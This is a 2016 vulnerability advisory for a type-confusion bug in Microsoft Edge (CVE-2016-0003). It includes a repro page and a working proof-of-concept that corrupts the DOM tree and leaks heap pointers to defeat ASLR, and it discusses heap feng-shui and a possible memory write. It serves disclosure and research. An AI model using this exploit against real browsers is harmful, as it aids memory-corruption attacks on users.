
March 10th, 2016 MS Edge CDOMTextNode::get_data type confusion


(MS16-002, CVE-2016-0003)

Specially crafted JavaScript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows a C++ object to be accessed as if it were a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

Known affected software, attack vectors and mitigation

Microsoft Edge 20.10240.16384.0

An attacker would need to get a target user to open a specially crafted web-page. JavaScript appears to be required to trigger the issue.

Repro.html

```html
<html>
  <head>
    <script>
      document.addEventListener("DOMNodeRemoved", function(oEvent) {
        oTextNode = document.createTextNode("");
        document.body.insertBefore(oTextNode);
      }, true);
      onload = function(){
        document.body.appendChild(oExistingChild);
        for (var oNode = document.body.firstChild;
            oNode && oNode != oNode.nextSibling; // note #1 below
            oNode = oNode.nextSibling
        ) {
          // Doing this seems to be required to avoid triggering an assert.
          // The tree is corrupt in that oTextNode.nextSibling == oTextNode
          // hence the extra check at #1 to prevent an infinite loop.
        }
        alert(oTextNode.nodeValue);
      }
    </script>
  </head>
  <body id=oParent>x<x id=oExistingChild>x</x></body>
</html>
```

Description

Appending an element to its current parent in the DOM tree causes Edge to first remove the element from that parent, which fires a DOMNodeRemoved event, and then re-append the element as the last child of the same parent. During the DOMNodeRemoved event, a JavaScript event handler can modify the DOM tree, e.g. by appending a text node to the parent element. This nested operation completes during the event, so the text node is appended as a child before the element that fired the event is. Once the event handler returns, the element is appended. It appears that the code determines the location where the element should be inserted before firing the DOMNodeRemoved event, so the element ends up as a child of the parent before the text node, rather than after it.
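The ordering described above can be illustrated with a toy model. This is only a sketch under stated assumptions: the parent is modelled as a plain array of labels, `appendExistingChild` and its `bStaleIndex` flag are hypothetical names, and nothing here reflects Edge's actual data structures or reproduces the tree corruption itself. It only shows how an insertion point chosen before the event fires puts the element in front of the text node.

```javascript
// Toy model: a parent is just an array of child labels. This is NOT Edge's code.
function appendExistingChild(aChildren, sChild, fOnNodeRemoved, bStaleIndex) {
  const uOldIndex = aChildren.indexOf(sChild);
  if (uOldIndex < 0) throw new Error(sChild + " is not a child");
  // Assumption: the buggy path picks the insertion point up front, i.e. the
  // index just past the last remaining child once sChild has been removed.
  const uStaleIndex = aChildren.length - 1;
  aChildren.splice(uOldIndex, 1);   // remove the child from its parent
  fOnNodeRemoved(aChildren);        // "DOMNodeRemoved": the handler may change the tree
  // The expected behaviour recomputes the end of the list after the event.
  const uInsertIndex = bStaleIndex ? uStaleIndex : aChildren.length;
  aChildren.splice(uInsertIndex, 0, sChild);
  return aChildren;
}

// Hypothetical handler that mimics the repro: it appends a text node.
const fAppendTextNode = (aChildren) => aChildren.push("oTextNode");

console.log(appendExistingChild(["x", "oExistingChild"], "oExistingChild", fAppendTextNode, true));
console.log(appendExistingChild(["x", "oExistingChild"], "oExistingChild", fAppendTextNode, false));
```

With the stale index the element lands before `oTextNode`; with the index recomputed after the event it lands after it, which is the order one would expect.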

After all this is done, the DOM tree has become corrupted. This can be confirmed by checking that the .nextSibling property of the text node is the text node itself, i.e. there is a loop in the DOM tree.
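A loop-safe way to check the sibling chain is sketched below. It is a generic cycle check, not something taken from the original PoC: `findSiblingLoop` is a hypothetical helper that only relies on objects having a `nextSibling` property, so it works on real DOM nodes as well as on the plain mock objects used here.

```javascript
// Walk a sibling chain and return the first node that is visited twice,
// or null if the chain ends normally.
function findSiblingLoop(oFirstChild) {
  const oSeen = new Set();
  for (let oNode = oFirstChild; oNode; oNode = oNode.nextSibling) {
    if (oSeen.has(oNode)) return oNode; // already visited: the chain loops
    oSeen.add(oNode);
  }
  return null;
}

// Mock of the corrupted state described above: the text node is its own sibling.
const oMockTextNode = { sName: "oTextNode", nextSibling: null };
oMockTextNode.nextSibling = oMockTextNode;
const oMockFirstChild = { sName: "x", nextSibling: oMockTextNode };

console.log(findSiblingLoop(oMockFirstChild) === oMockTextNode);
```

In a browser the same helper could be called as `findSiblingLoop(document.body.firstChild)`.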

Another effect is that reading the .nodeValue of the text node will cause the code to confuse a C++ object that Trident/Edge uses to model the DOM tree with a BSTR object that represents the text data stored in the text node. This allows an attacker to read the data stored in this C++ object, which includes various pointers.

Exploit

A PoC exploit that reads and shows partial content of the DOM tree object was created; it has been tested on x64 systems to show heap pointers, allowing an attacker to undo heap ASLR.

The amount of data read can be controlled by the attacker and data beyond the memory allocated for the C++ object can be read. An attacker may be able to use Heap Feng-Shui to position another object with interesting information in the memory following the C++ DOM tree object and read data from this second object as well.
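The comments in Exploit.html give concrete numbers for this: the text data is assumed to start at offset 0xC of the structure, and the number of WCHARs copied depends on the initial HTML. The arithmetic can be sketched as follows. The structure size of 0xB0 bytes is my own inference from the field layout listed in the PoC comments (the last listed field is 8 bytes at offset 0xA8), and `describeRead` is a hypothetical helper.

```javascript
const uBstrOffset = 0x0C;         // per the PoC comments: data is read from first_structure + 0xC
const uFirstStructureSize = 0xB0; // assumption: inferred from the field layout in the PoC comments

// Given the number of WCHARs copied, return the byte range that is read and
// whether it extends beyond the (assumed) end of first_structure.
function describeRead(uWChars) {
  const uEnd = uBstrOffset + uWChars * 2; // a WCHAR is 2 bytes
  return { uStart: uBstrOffset, uEnd: uEnd, bBeyondStructure: uEnd > uFirstStructureSize };
}

for (const uWChars of [0x21, 0xa4]) {
  const oRead = describeRead(uWChars);
  console.log("0x" + uWChars.toString(16) + " WCHARs: bytes 0x" + oRead.uStart.toString(16) +
      "-0x" + oRead.uEnd.toString(16) + (oRead.bBeyondStructure ? " (beyond the structure)" : ""));
}
```

A length of 0x21 WCHARs stays inside the structure (bytes 0x0C-0x4E), while 0xa4 WCHARs reaches offset 0x154, well past its assumed end.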

Finally, setting the nodeValue property is possible and caused an access violation when I attempted it. I did not analyze the code path or the cause of the access violation, but I suspect it may be possible to modify the C++ DOM tree object and/or other memory using this bug. This is of course even more interesting to an attacker, as it may allow remote code execution.

No attempt was made to create a PoC exploit that abuses this issue to undo ASLR and/or execute arbitrary code.

Exploit.html

```html
<html>
  <head>
    <script>
      var uNodeRemovedEvents = 0;
      onerror = function (sError, sSource, uLine){
        alert(sError + " on line " + uLine);
      };
      document.addEventListener("DOMNodeRemoved", function(oEvent) {
        if (uNodeRemovedEvents++ == 0) {
          oTextNode = document.createTextNode("[2]");
          // Note that insertBefore with no second argument is functionally equivalent to appendChild and Edge's
          // implementation will simply call the appendChild implementation. I have used insertBefore here to make it
          // easier to identify if a heap block was allocated by this call, or the appendChild call you'll see later:
          // the stack recorded by page heap does not include "appendChild" here but it does for the latter.
          document.body.insertBefore(oTextNode);
        };
      }, true);
      onload = function(){
        // appendChild on an element that has a parent will remove it from the parent first, trigger a DOMNodeRemoved
        // event, then append it as the last child of the new parent and trigger a DOMNodeInserted event.
        document.body.appendChild(oExistingChild);
        // However, during the DOMNodeRemoved event for oExistingChild, the oTextNode node is inserted using
        // appendChild. This second appendChild call is completed first, so the oTextNode node is appended as the last
        // child of the body element first. The DOMNodeRemoved event completes and the oExistingChild node is then
        // appended as the second to last child of the body element. For reasons unknown, after this the nextSibling of
        // oTextNode is corrupted and points to itself, creating a sort of loop in the DOM tree.
        for (var oNode = document.body.firstChild; oNode && oNode != oNode.nextSibling; oNode = oNode.nextSibling) {
          // Doing this seems to be required to avoid triggering an assert - not sure why, but it might cache the
          // tree in a way that prevents Edge from detecting that the tree is corrupt.
        }
        if (oTextNode.nextSibling !== oTextNode) {
          // This should have happened, but if the bug was triggered, the tree is corrupt and oTextNode is its own
          // sibling.
          throw new Error("Tree is not corrupt");
        }
        alert("Set breakpoints if needed");
        // ^^ You can set a breakpoint during this popup to follow what happens, some suggested locations:
        // * EDGEHTML!CDOMTextNode::get_data
        // * EDGEHTML!CDOMTextNode::get_length
        // * EDGEHTML!Tree::TextNode::TextNodeFromDOMTextNode
        // * msvcrt!memcpy_s
        // After hitting the breakpoint, you may want to step over code until you return from the call to
        // TextNodeFromDOMTextNode. Its return value is a pointer to a structure like this:
        // struct first_structure {
        //   DWORD dwUnknown_00;     // flags, value depends on DOM tree at start of repro.
        //   DWORD dwUnknown_04;
        //   VOID* pUnknown_08;
        //   VOID* pUnknown_10;
        //   VOID* pUnknown_18;
        //   VOID* pUnknown_20;
        //   BYTE[0x10] bUnknown_28;
        //   VOID* pUnknown_38;      // points to self or another structure, depends on DOM tree at start of repro.
        //   VOID* pUnknown_40;
        //   VOID* pUnknown_48;
        //   VOID* pElement_50;      // points to a C*Element instance
        //   VOID* pUnknown_58;
        //   BYTE[0x18] bUnknown_60;
        //   VOID* pUnknown_78;
        //   VOID* pUnknown_80;
        //   BYTE[0x10] bUnknown_88;
        //   VOID* pUnknown_98;
        //   VOID* pUnknown_A0;
        //   BYTE[0x8] bUnknown_A8;
        // }
        // The second_structure and third_structure referenced in the table below look like this:
        // struct second_structure {
        //   DWORD dwUnknown_00;     // flags, value depends on DOM tree at start of repro.
        //   DWORD dwUnknown_04;
        //   VOID* pUnknown_08;
        //   VOID* pUnknown_10;
        //   VOID* pUnknown_18;
        //   VOID* pUnknown_20;
        //   BYTE[0x8] bUnknown_28;
        //   VOID* pUnknown_30;
        //   VOID* pUnknown_38;
        //   BYTE[0x10] bUnknown_40;
        // }
        // struct third_structure {
        //   DWORD dwUnknown_00;     // flags, value depends on DOM tree at start of repro.
        //   DWORD dwUnknown_04;
        //   VOID* pUnknown_08;
        //   VOID* pUnknown_10;
        //   VOID* pUnknown_18;
        //   VOID* pUnknown_20;
        //   VOID* pElement_28;      // points to a C*Element instance
        //   VOID* pUnknown_30;
        //   BYTE[0x18] bUnknown_38;
        //   VOID* pUnknown_50;
        //   VOID* pUnknown_58;
        //   BYTE[0x10] bUnknown_60;
        //   VOID* pUnknown_70;
        //   VOID* pUnknown_78;
        //   BYTE[0x8] bUnknown_80;
        // }
        // These structures are typical structures used by Trident to keep track of the DOM tree. However, the code
        // appears to confuse them with structures of a type that contain the text data in a TextNode. The code assumes
        // that the length of the (BSTR) text data is found at "first_structure->pUnknown_38->dwUnknown_00", and the
        // BSTR itself at "first_structure + 0xC". These two values can be influenced through the initial HTML, like so:
        //                                     | first_structure                    | *pUnknown_38 |
        // Initial HTML:                       | dwUnknown_00 | typeof *pUnknown_38 | dwUnknown_00 |
        //-------------------------------------+--------------+---------------------+--------------+
        // x<x id=oExistingChild></x>          | 0x21         | (self)              | 0x21         |
        // x<x id=oExistingChild>x</x>         | 0x31         | second_structure    | 0xa4         |
        // x<x id=oExistingChild>x<a></a></x>  | 0x31         | third_structure     | 0x422        |
        // <a>x<x id=oExistingChild></x></a>   | 0x421        | (self)              | 0x421        |
        // So, "x<x id=oExistingChild></x>" is a "safe" value to use, as it will copy 0x21 WCHARs from
        // first_structure+0xC into a new BSTR; effectively copying bytes 0x0C-0x4E, which is well within the range of
        // the structure. This allows an attacker to read parts of the first_structure data, including a number of
        // pointers to heap data.
        //
        // If one would like to read information not stored in the first_structure, some of the other HTML strings may
        // be used to copy more information than is contained in just the first_structure: e.g.
        // "x<x id=oExistingChild>x</x>" copies 0xa4 WCHARs, which means bytes 0x0C-0x154, which is well beyond the
        // extent of the first_structure data. With page heap enabled, you will see an access violation. Without page
        // heap and with a bit of heap feng-shui, an attacker may be able to position an object with other interesting
        // information in the memory following the first_structure, e.g. an object with a vftable pointer. This would
        // allow an attacker to read the vftable pointer and determine the location of DLLs in memory.
        //
        // To keep this repro simple and reliable, it only attempts to read data from within first_structure.
        var sData = ("A" + oTextNode.nodeValue).substr(1); // make a copy
        var sHexData = "Read 0x" + sData.length.toString(16);
        sHexData += " bytes: ????????`????????"; // first three DWORDs are unknown
        var sHexQWord = "`????????"; // third DWORD is unknown
        for (var uBytes = 4, uOffset = 4, uIndex = 0; uIndex < sData.length; uIndex++) {
          var sHexWord = sData.charCodeAt(uIndex).toString(16);
          while (sHexWord.length < 4) sHexWord = "0" + sHexWord;
          sHexQWord = sHexWord + sHexQWord;
          uBytes += 2;
          if (uBytes == 4) sHexQWord = "`" + sHexQWord;
          if (uBytes == 8) {
            sHexData += " " + sHexQWord;
            sHexQWord = "";
            uBytes = 0;
          };
        };
        if (sHexQWord) {
          while (sHexQWord.length < 17) {
            if (sHexQWord.length == 8) sHexQWord += "`";
            sHexQWord = "????" + sHexQWord;
          }
          sHexData += " " + sHexQWord;
        }
        alert(sHexData);
        // This will crash because of the corrupt DOM tree, but it appears to indicate you may be able to modify
        // data as well as read it.
        oTextNode.nodeValue = "";
      };
    </script>
  </head>
  <body>x<x id=oExistingChild></x></body>
</html>
```
